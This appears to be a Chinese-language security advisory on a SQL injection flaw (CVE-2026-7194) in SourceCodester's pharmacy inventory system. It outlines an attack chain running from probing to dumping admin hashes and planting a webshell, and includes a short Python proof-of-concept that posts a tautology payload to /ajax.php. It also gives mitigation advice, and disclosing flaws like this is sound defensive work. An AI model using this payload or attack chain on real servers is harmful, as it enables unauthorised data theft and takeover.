CVE-2026-7194 CVSS 7.3 高危

CVE-2026-7194 SourceCodester药房系统SQL注入漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7194

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pharmacy Sales and Inventory System

漏洞概述

SourceCodester Pharmacy Sales and Inventory System 1.0存在SQL注入漏洞。漏洞位于/ajax.php?action=save_product接口，因未对ID参数进行有效过滤，允许攻击者注入恶意SQL语句。攻击者无需认证即可远程利用，可能导致敏感信息泄露、数据篡改。目前利用代码已公开，风险较高，需尽快修复。

技术细节

该漏洞源于SourceCodester Pharmacy Sales and Inventory System 1.0在处理产品保存请求时的安全编程缺陷。具体而言，在/ajax.php文件处理action=save_product请求时，后端代码直接将用户提交的ID参数拼接至SQL查询语句中，未使用预编译语句或进行严格的输入验证。攻击者可以通过发送包含单引号、注释符及UNION查询等恶意字符的Payload，诱使数据库执行非预期命令。由于CVSS评分为7.3且无需用户交互（UI:N）和权限（PR:N），攻击者可轻易通过自动化工具批量扫描并利用此漏洞，获取后台管理员账号密码、客户订单信息及库存数据，严重威胁业务安全。

攻击链分析

STEP 1

侦察

攻击者使用网络扫描工具识别互联网上运行SourceCodester Pharmacy Sales and Inventory System 1.0的目标服务器。

STEP 2

漏洞探测

攻击者向目标服务器的/ajax.php端点发送带有特殊构造的ID参数（如单引号）的测试请求，观察服务器响应是否包含数据库错误信息或异常行为，以确认SQL注入漏洞的存在。

STEP 3

漏洞利用

确认漏洞后，攻击者利用UNION SELECT等SQL语句提取数据库结构、表名、列名，并最终导出敏感数据（如管理员密码哈希）。

STEP 4

权限提升与维持

利用获取的管理员凭据登录后台系统，进一步上传Webshell或进行恶意操作，实现对服务器的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_sql_injection(url):
    """
    PoC for CVE-2026-7194 SQL Injection vulnerability.
    Target: /ajax.php?action=save_product
    Vulnerable Parameter: ID
    """
    target_url = f"{url}/ajax.php"
    # Basic payload to test SQL injection
    payload = {
        "action": "save_product",
        "id": "1' OR '1'='1"  # Simple SQL injection payload
    }
    
    try:
        response = requests.post(target_url, data=payload)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check response for SQL behavior.")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://target-ip" # Replace with actual target
    exploit_sql_injection(target)

影响范围

SourceCodester Pharmacy Sales and Inventory System 1.0

防御指南

临时缓解措施

建议管理员立即检查系统日志，排查是否存在针对/ajax.php接口的异常请求。作为临时缓解措施，可在代码层面对ID参数进行正则过滤（例如只允许数字），或直接禁用受影响的功能模块直至官方补丁发布。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7194
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7194
3 Details https://www.cvedetails.com/cve/CVE-2026-7194/
4 VulDB https://vuldb.com/cve/CVE-2026-7194
5 Link https://github.com/bfs045313-wq/cv3-protect/issues/2
6 Link https://vuldb.com/submit/800977
7 Link https://vuldb.com/vuln/359798
8 Link https://vuldb.com/vuln/359798/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表